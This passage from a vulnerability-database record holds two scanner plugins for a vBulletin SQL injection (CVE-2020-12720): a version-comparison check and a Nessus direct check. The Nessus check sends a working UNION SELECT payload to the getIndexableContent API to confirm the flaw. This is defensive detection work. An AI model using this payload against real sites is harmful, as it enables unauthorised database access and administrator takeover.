script_xref(name:\"URL\", value:\"https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1\");\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif (!port = get_app_port(cpe: CPE))\n exit(0);\n\nif (!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: TRUE))\n exit(0);\n\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif (version_is_less_equal(version: version, test_version: \"5.5.6\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.5.6 Patch Level 1\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"5.6.0\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.6.0 Patch Level 1\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nif (version_is_equal(version: version, test_version: \"5.6.1\")) {\n report = report_fixed_ver(installed_version: version, fixed_version: \"5.6.1 Patch Level 1\", install_path: location);\n security_message(port: port, data: report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2020-05-21T20:38:04", "bulletinFamily": "scanner", "description": "The version of vBulletin running on the remote host is affected by an input-validation flaw in the\ncontent_infraction/getIndexableContent API that allows for SQL injection. This can be levereged by an attacker to\nobtain administrator privileges leading to remote code execution.", "modified": "2020-05-15T00:00:00", "id": "VBULLETIN_CVE-2020-12720_DIRECT.NASL", "href": "https://www.tenable.com/plugins/nessus/136613", "published": "2020-05-15T00:00:00", "title": "vBulletin 'getIndexableContent' SQL Injection (direct check)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136613);\n script_version(\"1.2\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/18\");\n\n script_cve_id(\"CVE-2020-12720\");\n\n script_name(english:\"vBulletin 'getIndexableContent' SQL Injection (direct check)\");\n script_summary(english:\"Tries to inject SQL.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A bulletin board system running on the remote web server has an SQL injection vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of vBulletin running on the remote host is affected by an input-validation flaw in the\ncontent_infraction/getIndexableContent API that allows for SQL injection. This can be levereged by an attacker to\nobtain administrator privileges leading to remote code execution.\");\n # https://forum.vbulletin.com/forum/vbulletin-announcements/vbulletin-announcements_aa/4440032-vbulletin-5-6-1-security-patch-level-1\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?185c2276\");\n # https://www.tenable.com/blog/cve-2020-12720-vbulletin-urges-users-to-patch-undisclosed-security-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?396e8bf9\");\n script_set_attribute(attribute:\"see_also\", value:\"https://twitter.com/Zenofex/status/1260164977077424128\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to vBulletin 5.6.1 PL1 or 5.6.0 PL1 or 5.5.6 PL1 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-12720\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/15\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:vbulletin:vbulletin\");\n script_end_attributes();\n\n script_category(ACT_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"vbulletin_detect.nasl\");\n script_require_keys(\"www/vBulletin\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80);\ninstall = get_kb_item_or_exit('www/'+port+'/vBulletin');\n\nmatches = pregmatch(string:install, pattern:\"^(.+) under (/.*)$\");\nif (!matches)\n audit(AUDIT_WEB_APP_NOT_INST, \"vBulletin\", port);\n\ndir = matches[2];\n\nif (dir !~ '/$')\n dir = dir + '/';\n\nurl = dir + 'ajax/api/content_infraction/getIndexableContent';\n\nres = http_send_recv3(\n method:'POST',\n item:url,\n data:'nodeId[nodeid]=1+UNION+SELECT+26,25,24,23,22,21,20,19,20,17,16,15,14,13,12,11,10,concat(CRC32(\\'Nessus\\'),\\' \\',@@version),8,7,6,5,4,3,2,1--',\n add_headers:make_array('Content-Type', 'application/x-www-form-urlencoded', 'X-Requested-With', 'XMLHttpRequest'),\n port:port,\n exit_on_fail:TRUE\n);\n\n# CRC32('Nessus') is 1631274700\nif ('1631274700' >!< res[2])\n audit(AUDIT_WEB_APP_NOT_AFFECTED, 'vBulletin', build_url(port:port,qs:dir));\n\nreport =\n 'Nessus was able to verify the issue using the following request :\\n\\n' +\n http_last_sent_request() + '\\n\\n' +\n 'The above request resulted in the following output :\\n\\n' +\n res[2] + '\\n\\n';\n\nsecurity_report_v4(port:port, extra:report, severity:SECURITY_HOLE, sqli:TRUE);\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}